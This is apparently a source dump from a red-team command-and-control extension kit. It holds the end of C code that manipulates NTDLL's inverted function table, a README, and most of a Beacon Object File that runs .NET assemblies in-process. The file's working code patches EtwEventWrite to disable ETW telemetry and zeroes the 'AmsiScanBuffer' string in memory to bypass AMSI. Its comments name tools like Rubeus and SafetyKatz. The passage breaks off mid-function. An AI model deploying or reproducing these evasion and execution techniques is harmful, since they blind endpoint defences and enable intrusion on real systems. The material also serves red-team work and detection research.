    // create a copy of NTDLL's entry so we know what we are looking for
    ntdll_entry.FunctionTable = RVA2VA(PVOID, dos, rva);
    ntdll_entry.ImageBase     = dos;
    ntdll_entry.SizeOfImage   = nt->OptionalHeader.SizeOfImage;
    ntdll_entry.SizeOfTable   = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXCEPTION].Size;

    // find the .mrdata section on NTDLL
    pSection = IMAGE_FIRST_SECTION(nt);
    for (INT i = 0; i < nt->FileHeader.NumberOfSections; i++)
    {
        if (!strncmp(".mrdata", (LPCSTR)pSection->Name, 8))
        {
            stBegin = RVA2VA(PVOID, dos, pSection->VirtualAddress);
            dwLen = pSection->Misc.VirtualSize;
            break;
        }

        ++pSection;
    }

    if (!stBegin || !dwLen)
    {
        DPRINT("Failed to find section");
        return NULL;
    }

    // look for NTDLL's entry
    for (DWORD i = 0; i < dwLen - sizeof(INVERTED_FUNCTION_TABLE_ENTRY); ++i)
    {
        stRet = RtlCompareMemory(stBegin, &ntdll_entry, sizeof(INVERTED_FUNCTION_TABLE_ENTRY));

        if (stRet == sizeof(INVERTED_FUNCTION_TABLE_ENTRY))
        {
            stEnd = stBegin;
            break;
        }

        stBegin = RVA2VA(PVOID, stBegin, 1);
    }

    if (!stEnd)
    {
        DPRINT("Failed to find inverted function table");
        return NULL;
    }

    // get the base of the structure
    stEnd = CONTAINING_RECORD(stEnd, INVERTED_FUNCTION_TABLE_KERNEL_MODE, TableEntry);

    return stEnd;
}

/*
 * The code below is (mostly) equivalent to ntdll!RtlpInsertInvertedFunctionTableEntry,
 * but we do this by hand because that API is not exported by NTDLL.
 * Given that we are dealing with internal undocumented Windows structures,
 * there is no guarantee that this will work on older or newer versions.
 * This has been tested on Windows 10.0.19045, YMMV
 */
BOOL insert_inverted_function_table_entry(
    IN PVOID base_address,
    IN SIZE_T size_of_image,
    IN PRUNTIME_FUNCTION func_table,
    IN DWORD size_of_table)
{
    BOOL                                 Success   = FALSE;
    BOOL                                 is_unprot = FALSE;
    DWORD                                num_elems = 0;
    PINVERTED_FUNCTION_TABLE_KERNEL_MODE ift       = NULL;
    PINVERTED_FUNCTION_TABLE_ENTRY       fte       = NULL;

    ift = find_inverted_function_table();
    if (!ift)
        goto Cleanup;

    if (!protect_inverted_function_table(FALSE))
        goto Cleanup;

    is_unprot = TRUE;

    if (ift->CurrentSize == ift->MaximumSize)
    {
        ift->Overflow = 1;
        DPRINT("Too many entries in the inverted function table");
        goto Cleanup;
    }

    //ift->Epoch++;
    num_elems = 1;
    if (ift->CurrentSize != 1)
    {
        if (ift->CurrentSize > 1)
        {
            // ntdll is always at 0, so we start at 1
            fte = &ift->TableEntry[1];
            do
            {
                if (base_address < fte->FunctionTable)
                    break;

                num_elems++;
                fte++;
            } while(num_elems < ift->CurrentSize);
        }

        if (num_elems != ift->CurrentSize)
        {
            memcpy(
                &ift->TableEntry[num_elems + 1],
                &ift->TableEntry[num_elems],
                (ift->CurrentSize - num_elems) * sizeof(INVERTED_FUNCTION_TABLE_ENTRY));
        }
    }

    ift->TableEntry[num_elems].FunctionTable = func_table;
    ift->TableEntry[num_elems].ImageBase     = base_address;
    ift->TableEntry[num_elems].SizeOfImage   = size_of_image;
    ift->TableEntry[num_elems].SizeOfTable   = size_of_table;

    ift->CurrentSize++;
    //ift->Epoch++;

    Success = TRUE;

Cleanup:
    if (is_unprot)
        protect_inverted_function_table(TRUE);

    return Success;
}

/*
 * Once we are done, we remove our entry from the inverted function table
 */
BOOL remove_inverted_function_table_entry(
    IN PRUNTIME_FUNCTION func_table)
{
    BOOL                                 Success   = FALSE;
    BOOL                                 is_unprot = FALSE;
    PINVERTED_FUNCTION_TABLE_KERNEL_MODE ift       = NULL;
    PINVERTED_FUNCTION_TABLE_ENTRY       fte       = NULL;

    ift = find_inverted_function_table();
    if (!ift)
        goto Cleanup;

    for (DWORD i = 1; i < ift->CurrentSize; ++i)
    {
        fte = &ift->TableEntry[i];

        if (fte->FunctionTable == func_table)
        {
            if (!protect_inverted_function_table(FALSE))
                goto Cleanup;

            is_unprot = TRUE;

            if (ift->CurrentSize != i + 1)
            {
                memcpy(
                    &ift->TableEntry[i],
                    &ift->TableEntry[i + 1],
                    (ift->CurrentSize - i - 1) * sizeof(INVERTED_FUNCTION_TABLE_ENTRY));
            }

            ift->CurrentSize--;

            break;
        }
    }

    Success = TRUE;

Cleanup:
    if (is_unprot)
        protect_inverted_function_table(TRUE);

    return Success;
}

#endif // _WIN64


================================================
FILE: Execution-BOF/README.md
================================================
# Execution-BOF

BOFs for inline execution

![](./_img/01.png)

## execute-assembly

Perform in process .NET assembly execution

```
execute-assembly <path> [params]
```
 
The defaults are set as follows in `execute-assembly/inlineExecute-Assembly.c` to change them, edit and recompile.

```
	char* appDomain = "test";
	char* pipeName = "test";
	char* slotName = "test";
	BOOL amsi = 1;
	BOOL etw = 1;
	BOOL revertETW = 1;
	BOOL mailSlot = 0;
	ULONG entryPoint = 1;
```



## noconsolation

This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e. spawning `conhost.exe`). [More details](https://github.com/Adaptix-Framework/Extension-Kit/blob/main/Execution-BOF/No-Consolation/README.md)


## Credits

* InlineExecute-Assembly - https://github.com/anthemtotheego/InlineExecute-Assembly
* AMSI bypass - https://practicalsecurityanalytics.com/new-amsi-bypss-technique-modifying-clr-dll-in-memory/
* No-Consolation - https://github.com/fortra/No-Consolation

================================================
FILE: Execution-BOF/execute-assembly/inlineExecute-Assembly.c
================================================
#include <windows.h>
#include <io.h>
#include <stdio.h>
#include <fcntl.h>
#include <evntprov.h>

#include "beacon.h"
#include "inlineExecute-Assembly.h"

#define CHUNK_SIZE 65535  // Optimal chunk size for transmission
#define INITIAL_BUFFER_SIZE 65535  // Initial buffer size for small outputs

// Global cleanup tracking
typedef struct _CLEANUP_CONTEXT {
    char* pipePath;
    char* slotPath;
    wchar_t* wAssemblyArguments;
    wchar_t* wAppDomain;
    HINSTANCE hUser32;
    HANDLE mainHandle;
    HANDLE hFile;
    HANDLE hEvent;
    char* returnData;
    size_t returnDataSize;  // Track allocated size
    BOOL useChunking;  // Flag to indicate if chunking was used
    ICLRMetaHost* pClrMetaHost;
    ICLRRuntimeInfo* pClrRuntimeInfo;
    ICorRuntimeHost* pICorRuntimeHost;
    IUnknown* pAppDomainThunk;
    AppDomain* pAppDomain;
    Assembly* pAssembly;
    MethodInfo* pMethodInfo;
    SAFEARRAY* pSafeArray;
    SAFEARRAY* psaStaticMethodArgs;
    VARIANT vtPsa;
    VARIANT retVal;
    VARIANT obj;
} CLEANUP_CONTEXT, *PCLEANUP_CONTEXT;

// Initialize cleanup context
static void InitCleanupContext(PCLEANUP_CONTEXT ctx) {
    MSVCRT$memset(ctx, 0, sizeof(CLEANUP_CONTEXT));
    ctx->mainHandle = INVALID_HANDLE_VALUE;
    ctx->hFile = INVALID_HANDLE_VALUE;
    ctx->hEvent = INVALID_HANDLE_VALUE;
    ctx->useChunking = FALSE;
    ctx->returnDataSize = 0;
}

// Cleanup function
static void PerformCleanup(PCLEANUP_CONTEXT ctx, BOOL frConsole, BOOL revertETW) {
    // Free allocated memory
    if (ctx->pipePath) { MSVCRT$free(ctx->pipePath); }
    if (ctx->slotPath) { MSVCRT$free(ctx->slotPath); }
    if (ctx->wAssemblyArguments) { MSVCRT$free(ctx->wAssemblyArguments); }
    if (ctx->wAppDomain) { MSVCRT$free(ctx->wAppDomain); }
    if (ctx->returnData) { intFree(ctx->returnData); }

    // Free library handles
    if (ctx->hUser32) { KERNEL32$FreeLibrary(ctx->hUser32); }

    // Close handles
    if (ctx->mainHandle != INVALID_HANDLE_VALUE) { KERNEL32$CloseHandle(ctx->mainHandle); }
    if (ctx->hFile != INVALID_HANDLE_VALUE) { KERNEL32$CloseHandle(ctx->hFile); }
    if (ctx->hEvent != INVALID_HANDLE_VALUE) { KERNEL32$CloseHandle(ctx->hEvent); }

    // Clean up COM objects
    if (ctx->pSafeArray) { OLEAUT32$SafeArrayDestroy(ctx->pSafeArray); }
    if (ctx->psaStaticMethodArgs) { OLEAUT32$SafeArrayDestroy(ctx->psaStaticMethodArgs); }

    OLEAUT32$VariantClear(&ctx->vtPsa);
    OLEAUT32$VariantClear(&ctx->retVal);
    OLEAUT32$VariantClear(&ctx->obj);

    if (ctx->pMethodInfo) { ctx->pMethodInfo->lpVtbl->Release(ctx->pMethodInfo); }
    if (ctx->pAssembly) { ctx->pAssembly->lpVtbl->Release(ctx->pAssembly); }
    if (ctx->pAppDomain) { ctx->pAppDomain->lpVtbl->Release(ctx->pAppDomain); }
    if (ctx->pAppDomainThunk) { ctx->pAppDomainThunk->lpVtbl->Release(ctx->pAppDomainThunk); }

    if (ctx->pICorRuntimeHost && ctx->pAppDomainThunk) {
        ctx->pICorRuntimeHost->lpVtbl->UnloadDomain(ctx->pICorRuntimeHost, ctx->pAppDomainThunk);
    }
    if (ctx->pICorRuntimeHost) { ctx->pICorRuntimeHost->lpVtbl->Release(ctx->pICorRuntimeHost); }
    if (ctx->pClrRuntimeInfo) { ctx->pClrRuntimeInfo->lpVtbl->Release(ctx->pClrRuntimeInfo); }
    if (ctx->pClrMetaHost) { ctx->pClrMetaHost->lpVtbl->Release(ctx->pClrMetaHost); }

    // Free console if we created one
    if (frConsole) {
        _FreeConsole FreeConsole = (_FreeConsole) KERNEL32$GetProcAddress(KERNEL32$GetModuleHandleA("kernel32.dll"), "FreeConsole");
        if (FreeConsole) { FreeConsole(); }
    }

    // Revert ETW if requested
    if (revertETW) {
        BOOL success = patchETW(revertETW);
        if (success != 1) {
            BeaconPrintf(CALLBACK_ERROR , "[!] Reverting ETW back failed");
        }
    }
}

/*Make MailSlot*/
BOOL WINAPI MakeSlot(LPCSTR lpszSlotName, HANDLE* mailHandle)
{
    *mailHandle = KERNEL32$CreateMailslotA(lpszSlotName,
        0,                             //No maximum message size
        MAILSLOT_WAIT_FOREVER,         //No time-out for operations
        (LPSECURITY_ATTRIBUTES)NULL);  //Default security

    if (*mailHandle == INVALID_HANDLE_VALUE)
    {
        return FALSE;
    }
    else
        return TRUE;
}

/*Read Mailslot with hybrid buffer/chunking approach and intermediate buffering*/
BOOL ReadSlotHybrid(char* output, size_t outputSize, HANDLE* mailHandle, HANDLE* hEventOut) {
    DWORD cbMessage = 0;
    DWORD cMessage = 0;
    DWORD cbRead = 0;
    BOOL fResult;
    LPSTR lpszBuffer = NULL;
    HANDLE hEvent;
    OVERLAPPED ov;
    size_t totalWritten = 0;
    BOOL chunkingMode = FALSE;

    // Intermediate buffer for chunking mode
    char* chunkBuffer = NULL;
    size_t chunkBufferSize = CHUNK_SIZE;
    size_t chunkBufferUsed = 0;

    hEvent = KERNEL32$CreateEventA(NULL, FALSE, FALSE, NULL);
    if (NULL == hEvent) {
        return FALSE;
    }

    *hEventOut = hEvent;

    ov.Offset = 0;
    ov.OffsetHigh = 0;
    ov.hEvent = hEvent;

    while (TRUE) {
        fResult = KERNEL32$GetMailslotInfo(*mailHandle,
            (LPDWORD)NULL,
            &cbMessage,
            &cMessage,
            (LPDWORD)NULL);

        if (!fResult) {
            if (chunkBuffer) MSVCRT$free(chunkBuffer);
            KERNEL32$CloseHandle(hEvent);
            return FALSE;
        }

        if (cbMessage == MAILSLOT_NO_MESSAGE) {
            break;
        }

        lpszBuffer = (LPSTR)KERNEL32$GlobalAlloc(GPTR, cbMessage + 1);
        if (NULL == lpszBuffer) {
            if (chunkBuffer) MSVCRT$free(chunkBuffer);
            KERNEL32$CloseHandle(hEvent);
            return FALSE;
        }

        fResult = KERNEL32$ReadFile(*mailHandle,
            lpszBuffer,
            cbMessage,
            &cbRead,
            &ov);

        if (!fResult) {
            KERNEL32$GlobalFree((HGLOBAL)lpszBuffer);
            if (chunkBuffer) MSVCRT$free(chunkBuffer);
            KERNEL32$CloseHandle(hEvent);
            return FALSE;
        }

        // Ensure null termination
        lpszBuffer[cbRead] = '\0';

        // Get actual string length
        size_t msgLen = MSVCRT$strlen(lpszBuffer);

        // Check if message ends with newline
        BOOL hasNewline = FALSE;
        if (msgLen > 0) {
            if (lpszBuffer[msgLen - 1] == '\n' || lpszBuffer[msgLen - 1] == '\r') {
                hasNewline = TRUE;
            }
        }

        if (!chunkingMode && totalWritten + msgLen + (hasNewline ? 0 : 1) < outputSize - 1) {
            // Normal buffer mode
            MSVCRT$memcpy(output + totalWritten, lpszBuffer, msgLen);
            totalWritten += msgLen;

            // Add newline if message doesn't have one
            if (!hasNewline && msgLen > 0) {
                output[totalWritten] = '\n';
                totalWritten++;
            }

            output[totalWritten] = '\0';
        } else {
            // Switch to or continue in chunking mode
            if (!chunkingMode) {
                // First time switching - send accumulated buffer
                chunkingMode = TRUE;
                output[totalWritten] = '\0';
                BeaconPrintf(CALLBACK_OUTPUT, "\n\n%s", output);

                // Allocate intermediate chunk buffer
                chunkBuffer = (char*)MSVCRT$malloc(chunkBufferSize);
                if (!chunkBuffer) {
                    KERNEL32$GlobalFree((HGLOBAL)lpszBuffer);
                    KERNEL32$CloseHandle(hEvent);
                    return FALSE;
                }
                chunkBufferUsed = 0;
            }

            // Calculate space needed including potential newline
            size_t neededSpace = msgLen + (hasNewline ? 0 : 1);
            size_t spaceLeft = chunkBufferSize - chunkBufferUsed - 1;

            if (neededSpace <= spaceLeft) {
                // Message fits in current chunk buffer
                MSVCRT$memcpy(chunkBuffer + chunkBufferUsed, lpszBuffer, msgLen);
                chunkBufferUsed += msgLen;

                // Add newline if needed
                if (!hasNewline && msgLen > 0) {
                    chunkBuffer[chunkBufferUsed] = '\n';
                    chunkBufferUsed++;
                }

                chunkBuffer[chunkBufferUsed] = '\0';

                // Send chunk if buffer is reasonably full (>75% capacity)
                if (chunkBufferUsed > (chunkBufferSize * 3 / 4)) {
                    BeaconPrintf(CALLBACK_OUTPUT, "%s", chunkBuffer);
                    chunkBufferUsed = 0;
                    chunkBuffer[0] = '\0';
                }
            } else {
                // Message doesn't fit - send current buffer and start new one
                if (chunkBufferUsed > 0) {
                    chunkBuffer[chunkBufferUsed] = '\0';
                    BeaconPrintf(CALLBACK_OUTPUT, "%s", chunkBuffer);
                    chunkBufferUsed = 0;
                }

                // Check if this single message is larger than our chunk buffer
                if (neededSpace >= chunkBufferSize - 1) {
                    // Very large single message - send it directly
                    BeaconPrintf(CALLBACK_OUTPUT, "%s", lpszBuffer);
                    if (!hasNewline) {
                        BeaconPrintf(CALLBACK_OUTPUT, "\n");
                    }
                    chunkBufferUsed = 0;
                } else {
                    // Normal message - add to empty buffer
                    MSVCRT$memcpy(chunkBuffer, lpszBuffer, msgLen);
                    chunkBufferUsed = msgLen;

                    if (!hasNewline && msgLen > 0) {
                        chunkBuffer[chunkBufferUsed] = '\n';
                        chunkBufferUsed++;
                    }

                    chunkBuffer[chunkBufferUsed] = '\0';
                }
            }
        }

        KERNEL32$GlobalFree((HGLOBAL)lpszBuffer);
    }

    if (chunkingMode) {
        // Send any remaining data in chunk buffer
        if (chunkBufferUsed > 0) {
            chunkBuffer[chunkBufferUsed] = '\0';
            BeaconPrintf(CALLBACK_OUTPUT, "%s", chunkBuffer);
        }

        MSVCRT$free(chunkBuffer);

        // Final newline for chunked output
        BeaconPrintf(CALLBACK_OUTPUT, "\n");
    }

    KERNEL32$CloseHandle(hEvent);
    return !chunkingMode;  // Return FALSE if chunking was used
}

// /*Improved version detection for .NET 4.x*/
// BOOL FindVersion(void * assembly, int length) {
//     char* assembly_c = (char*)assembly;
//
//     // Check for various .NET 4.x versions
//     char* v4_versions[] = {
//         "v4.0.30319",
//         "v4.5",
//         "v4.6",
//         "v4.7",
//         "v4.8"
//     };
//
//     int num_versions = sizeof(v4_versions) / sizeof(v4_versions[0]);
//
//     for (int v = 0; v < num_versions; v++) {
//         int version_len = MSVCRT$strlen(v4_versions[v]);
//
//         for (int i = 0; i < length - version_len; i++) {
//             BOOL found = TRUE;
//             for (int j = 0; j < version_len; j++) {
//                 if (v4_versions[v][j] != assembly_c[i + j]) {
//                     found = FALSE;
//                     break;
//                 }
//             }
//             if (found) {
//                 return 1;  // .NET 4.x found
//             }
//         }
//     }
//
//     return 0;  // .NET 2.0
// }

/*Patch ETW - Fixed*/
BOOL patchETW(BOOL revertETW)
{
    unsigned char etwPatch[8] = {0};  // Sufficient size for both architectures
    SIZE_T uSize = 8;
    ULONG patchSize = 0;

    if (revertETW != 0) {
#ifdef _M_AMD64
        //revert ETW x64
        patchSize = 1;
        etwPatch[0] = 0x4c;
#elif defined(_M_IX86)
        //revert ETW x86
        patchSize = 3;
        etwPatch[0] = 0x8b;
        etwPatch[1] = 0xff;
        etwPatch[2] = 0x55;
#endif
    }
    else {
#ifdef _M_AMD64
        //Break ETW x64
        patchSize = 1;
        etwPatch[0] = 0xc3;
#elif defined(_M_IX86)
        //Break ETW x86
        patchSize = 3;
        etwPatch[0] = 0xc2;
        etwPatch[1] = 0x14;
        etwPatch[2] = 0x00;
#endif
    }

    //Get pointer to EtwEventWrite
    void* pAddress = (PVOID) KERNEL32$GetProcAddress(KERNEL32$GetModuleHandleA("ntdll.dll"), "EtwEventWrite");
    if(pAddress == NULL)
    {
        BeaconPrintf(CALLBACK_ERROR , "[!] Getting pointer to EtwEventWrite failed\n");
        return 0;
    }

    void* lpBaseAddress = pAddress;
    ULONG OldProtection, NewProtection;

    //Change memory protection via NTProtectVirtualMemory
    _NtProtectVirtualMemory NtProtectVirtualMemory = (_NtProtectVirtualMemory) KERNEL32$GetProcAddress(KERNEL32$GetModuleHandleA("ntdll.dll"), "NtProtectVirtualMemory");
    NTSTATUS status = NtProtectVirtualMemory(NtCurrentProcess(), (PVOID)&lpBaseAddress, (PULONG)&uSize, PAGE_EXECUTE_READWRITE, &OldProtection);
    if (status != STATUS_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR , "[!] NtProtectVirtualMemory failed %d\n", status);
        return 0;
    }

    //Patch ETW via NTWriteVirtualMemory
    _NtWriteVirtualMemory NtWriteVirtualMemory = (_NtWriteVirtualMemory) KERNEL32$GetProcAddress(KERNEL32$GetModuleHandleA("ntdll.dll"), "NtWriteVirtualMemory");
    status = NtWriteVirtualMemory(NtCurrentProcess(), pAddress, (PVOID)etwPatch, patchSize, NULL);
    if (status != STATUS_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR , "[!] NtWriteVirtualMemory failed\n");
        return 0;
    }

    //Revert back memory protection via NTProtectVirtualMemory
    status = NtProtectVirtualMemory(NtCurrentProcess(), (PVOID)&lpBaseAddress, (PULONG)&uSize, OldProtection, &NewProtection);
    if (status != STATUS_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR , "[!] NtProtectVirtualMemory2 failed\n");
        return 0;
    }

    //Successfully patched ETW
    return 1;
}

static BOOL IsReadable(DWORD protect, DWORD state)
{
    if (!((protect & PAGE_READONLY) == PAGE_READONLY || (protect & PAGE_READWRITE) == PAGE_READWRITE || (protect & PAGE_EXECUTE_READWRITE) == PAGE_EXECUTE_READWRITE || (protect & PAGE_EXECUTE_READ) == PAGE_EXECUTE_READ)) {
        return 0;
    }

    if ((protect & PAGE_GUARD) == PAGE_GUARD) {
        return 0;
    }

    if ((state & MEM_COMMIT) != MEM_COMMIT) {
        return 0;
    }

    return 1;
}

static BOOL search_mem(MEMORY_BASIC_INFORMATION* region, _NtProtectVirtualMemory NtProtectVirtualMemory)
{
    NTSTATUS status;

    if (!IsReadable(region->Protect, region->State)) {
        return 0;
    }

    for (int j = 0; j < region->RegionSize - 14; j++) {  // Fixed: use actual string length
        unsigned char* current = ((unsigned char*)region->BaseAddress) + j;

        char target_name[] = "AnsiScamBaffer";
        target_name[1] = 'm'; target_name[7] = 'n'; target_name[9] = 'u';
        int target_len = 14;

        BOOL found = 1;
        for (int k = 0; k < target_len; k++) {  // Fixed: use target_len instead of sizeof
            if (current[k] != target_name[k]) {
                found = 0;
                break;
            }
        }

        if (found) {
            DWORD original = 0;
            if ((region->Protect & PAGE_READWRITE) != PAGE_READWRITE) {
                status = NtProtectVirtualMemory(NtCurrentProcess(), (PVOID)&region->BaseAddress, (PULONG)&region->RegionSize, PAGE_READWRITE, &original);
                if (status != STATUS_SUCCESS) {
                    BeaconPrintf(CALLBACK_ERROR , "[!] search_mem: NtProtectVirtualMemory failed\n");
                    continue;
                }
            }

            for (int m = 0; m < target_len; m++) {
                current[m] = 0;
            }

            if ((region->Protect & PAGE_READWRITE) != PAGE_READWRITE) {
                NtProtectVirtualMemory(NtCurrentProcess(), (PVOID)&region->BaseAddress, (PULONG)&region->RegionSize, region->Protect, &original);
            }

            return 1;
        }
    }

    return 0;
}

BOOL patchAMSI()
{
    _NtProtectVirtualMemory pNtProtectVirtualMemory = (_NtProtectVirtualMemory) KERNEL32$GetProcAddress(KERNEL32$GetModuleHandleA("ntdll.dll"), "NtProtectVirtualMemory");

    HANDLE hProcess = KERNEL32$GetCurrentProcess();

    SYSTEM_INFO sysInfo;
    KERNEL32$GetSystemInfo(&sysInfo);

    int count = 0;
    unsigned char* pAddress = 0;
    MEMORY_BASIC_INFORMATION memInfo;

    while (pAddress < sysInfo.lpMaximumApplicationAddress) {
        if (KERNEL32$VirtualQuery(pAddress, &memInfo, sizeof(memInfo))) {
            if (search_mem(&memInfo, pNtProtectVirtualMemory))
                count++;
        }
        pAddress += memInfo.RegionSize;
    }

    return (count > 0);
}

/*Start CLR*/
static BOOL StartCLR(LPCWSTR dotNetVersion, ICLRMetaHost * *ppClrMetaHost, ICLRRuntimeInfo * *ppClrRuntimeInfo, ICorRuntimeHost * *ppICorRuntimeHost) {

    HRESULT hr = (HRESULT)NULL;

    hr = MSCOREE$CLRCreateInstance(&xCLSID_CLRMetaHost, &xIID_ICLRMetaHost, (LPVOID*)ppClrMetaHost);

    if (hr == S_OK)
    {
        hr = (*ppClrMetaHost)->lpVtbl->GetRuntime(*ppClrMetaHost, dotNetVersion, &xIID_ICLRRuntimeInfo, (LPVOID*)ppClrRuntimeInfo);
        if (hr == S_OK)
        {
            BOOL fLoadable;
            hr = (*ppClrRuntimeInfo)->lpVtbl->IsLoadable(*ppClrRuntimeInfo, &fLoadable);
            if ((hr == S_OK) && fLoadable)
            {
                hr = (*ppClrRuntimeInfo)->lpVtbl->GetInterface(*ppClrRuntimeInfo, &xCLSID_CorRuntimeHost, &xIID_ICorRuntimeHost, (LPVOID*)ppICorRuntimeHost);
                if (hr == S_OK)
                {
                    (*ppICorRuntimeHost)->lpVtbl->Start(*ppICorRuntimeHost);
                }
                else
                {
                    BeaconPrintf(CALLBACK_ERROR , "[!] Process refusing to get interface of %ls CLR version. Try running an assembly that requires a differnt CLR version.\n", dotNetVersion);
                    return 0;
                }
            }
            else
            {
                BeaconPrintf(CALLBACK_ERROR , "[!] Process refusing to load %ls CLR version. Try running an assembly that requires a differnt CLR version.\n", dotNetVersion);
                return 0;
            }
        }
        else
        {
            BeaconPrintf(CALLBACK_ERROR , "[!] Process refusing to get runtime of %ls CLR version. Try running an assembly that requires a differnt CLR version.\n", dotNetVersion);
            return 0;
        }
    }
    else
    {
        BeaconPrintf(CALLBACK_ERROR , "[!] Process refusing to create %ls CLR version. Try running an assembly that requires a differnt CLR version.\n", dotNetVersion);
        return 0;
    }

    return 1;
}

/*Check Console Exists*/
static BOOL consoleExists(void) {
    _GetConsoleWindow GetConsoleWindow = (_GetConsoleWindow) KERNEL32$GetProcAddress(KERNEL32$GetModuleHandleA("kernel32.dll"), "GetConsoleWindow");
    return !!GetConsoleWindow();
}

#define TMPBUFLEN 64

typedef BOOLEAN(WINAPI *RTLGENRANDOM)(PVOID, ULONG);

void gen_rand_str(char *buffer, int offset, int length)
{
    unsigned char randomBytes[TMPBUFLEN];

    RTLGENRANDOM pRtlGenRandom = (RTLGENRANDOM)KERNEL32$GetProcAddress(KERNEL32$LoadLibraryA("advapi32.dll"), "SystemFunction036");
    if (!pRtlGenRandom || !pRtlGenRandom(randomBytes, TMPBUFLEN))
    {
        BeaconPrintf(CALLBACK_ERROR, "[!] gen_rand_str: RtlGenRandom failed");
        return;
    }

    int end = offset + length;
    if (end > TMPBUFLEN) end = TMPBUFLEN;

    for (int i = offset; i < end; i++)
    {
        unsigned char val = randomBytes[i] % 26;
        buffer[i] = 'A' + val;
    }
    buffer[end] = '\0';
}

/*BOF Entry Point*/
void go(IN PCHAR buffer, IN ULONG blength)
{
    CLEANUP_CONTEXT ctx;
    InitCleanupContext(&ctx);

    datap parser;
    BeaconDataParse(&parser, buffer, blength);

    size_t assemblyByteLen = 0;
    char* assemblyBytes = BeaconDataExtract(&parser, &assemblyByteLen);

    // Extract arguments with length checking
    size_t argumentsLen = 0;
    char* assemblyArguments = BeaconDataExtract(&parser, &argumentsLen);

    // Validate arguments - if NULL, zero length, or contains only whitespace, treat as no arguments
    BOOL hasArguments = FALSE;
    if (assemblyArguments != NULL && argumentsLen > 0) {
        // Check if arguments contain any non-whitespace characters
        for (size_t i = 0; i < argumentsLen; i++) {
            if (assemblyArguments[i] != '\0' && assemblyArguments[i] != ' ' &&
                assemblyArguments[i] != '\t' && assemblyArguments[i] != '\n' &&
                assemblyArguments[i] != '\r') {
                hasArguments = TRUE;
                break;
            }
        }
    }

    // defaults
    char appDomain[TMPBUFLEN] = { 't', 'e', 's', 't', '-' };           gen_rand_str(appDomain, 5, 8);
    char pipeName[TMPBUFLEN]  = { 's', 'v', 'c', 't', 's', 't', '.' }; gen_rand_str(pipeName, 7, 12);
    char slotName[TMPBUFLEN]  = { 't', 's', 't', 's', 'l', 't', '-' }; gen_rand_str(slotName, 7, 8);

    BOOL amsi = 1;
    BOOL etw = 1;
    BOOL revertETW = 1;
    BOOL mailSlot = 1;  // Always use mailslot to avoid deadlock issues
    ULONG entryPoint = 1;

    //Create slot and pipe names with proper memory management
    SIZE_T pipeNameLen = MSVCRT$strlen(pipeName);
    ctx.pipePath = MSVCRT$malloc(pipeNameLen + 10);
    if (!ctx.pipePath) {
        BeaconPrintf(CALLBACK_ERROR, "[!] Memory allocation failed");
        return;
    }
    MSVCRT$memset(ctx.pipePath, 0, pipeNameLen + 10);
    MSVCRT$memcpy(ctx.pipePath, "\\\\.\\pipe\\", 9 );
    MSVCRT$memcpy(ctx.pipePath+9, pipeName, pipeNameLen+1 );

    SIZE_T slotNameLen = MSVCRT$strlen(slotName);
    ctx.slotPath = MSVCRT$malloc(slotNameLen + 14);
    if (!ctx.slotPath) {
        BeaconPrintf(CALLBACK_ERROR, "[!] Memory allocation failed");
        PerformCleanup(&ctx, FALSE, FALSE);
        return;
    }
    MSVCRT$memset(ctx.slotPath, 0, slotNameLen + 14);
    MSVCRT$memcpy(ctx.slotPath, "\\\\.\\mailslot\\", 13 );
    MSVCRT$memcpy(ctx.slotPath+13, slotName, slotNameLen+1 );

    //Declare other variables
    HRESULT hr = (HRESULT)NULL;
    LPWSTR* argumentsArray = NULL;
    int argumentCount = 0;
    HANDLE stdOutput;
    HANDLE stdError;
    size_t wideSize = 0;
    size_t wideSize2 = 0;
    BOOL success = 1;
    BOOL frConsole = 0;

    // Allocate initial buffer with configurable size
    ctx.returnDataSize = INITIAL_BUFFER_SIZE;
    ctx.returnData = (char*)intAlloc(ctx.returnDataSize);
    if (!ctx.returnData) {
        BeaconPrintf(CALLBACK_ERROR, "[!] Memory allocation failed");
        PerformCleanup(&ctx, FALSE, FALSE);
        return;
    }
    memset(ctx.returnData, 0, ctx.returnDataSize);

    //Determine .NET assembly version
    //FindVersion() scans raw assembly bytes for CLR version strings but fails
    //when the PE metadata format doesn't contain them as plain text, causing
    //a fallback to CLR v2.0 which breaks all modern .NET 4.x tools (Rubeus,
    //Seatbelt, SafetyKatz, SharpHound, etc.). Since .NET 2.0 assemblies are
    //effectively extinct in offensive tooling, default to CLR v4.0.
    wchar_t* wNetVersion = L"v4.0.30319";

    //Handle argument conversion based on whether we have valid arguments
    if (hasArguments) {
        // Convert assemblyArguments to wide string
        size_t convertedChars = 0;
        wideSize = MSVCRT$strlen(assemblyArguments) + 1;
        ctx.wAssemblyArguments = (wchar_t*)MSVCRT$malloc(wideSize * sizeof(wchar_t));
        if (!ctx.wAssemblyArguments) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Memory allocation failed");
            PerformCleanup(&ctx, FALSE, FALSE);
            return;
        }
        MSVCRT$mbstowcs_s(&convertedChars, ctx.wAssemblyArguments, wideSize, assemblyArguments, _TRUNCATE);

        // Parse arguments
        argumentsArray = SHELL32$CommandLineToArgvW(ctx.wAssemblyArguments, &argumentCount);
    } else {
        // No arguments - create empty wide string
        ctx.wAssemblyArguments = (wchar_t*)MSVCRT$malloc(sizeof(wchar_t));
        if (!ctx.wAssemblyArguments) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Memory allocation failed");
            PerformCleanup(&ctx, FALSE, FALSE);
            return;
        }
        ctx.wAssemblyArguments[0] = L'\0';
        argumentsArray = NULL;
        argumentCount = 0;
    }

    //Convert appDomain to wide string
    size_t convertedChars2 = 0;
    wideSize2 = MSVCRT$strlen(appDomain) + 1;
    ctx.wAppDomain = (wchar_t*)MSVCRT$malloc(wideSize2 * sizeof(wchar_t));
    if (!ctx.wAppDomain) {
        BeaconPrintf(CALLBACK_ERROR, "[!] Memory allocation failed");
        PerformCleanup(&ctx, FALSE, FALSE);
        return;
    }
    MSVCRT$mbstowcs_s(&convertedChars2, ctx.wAppDomain, wideSize2, appDomain, _TRUNCATE);

    //Create an array of strings for arguments
    ctx.vtPsa.vt = (VT_ARRAY | VT_BSTR);
    ctx.vtPsa.parray = OLEAUT32$SafeArrayCreateVector(VT_BSTR, 0, argumentCount);

    // Only populate array if we have arguments
    if (argumentCount > 0 && argumentsArray != NULL) {
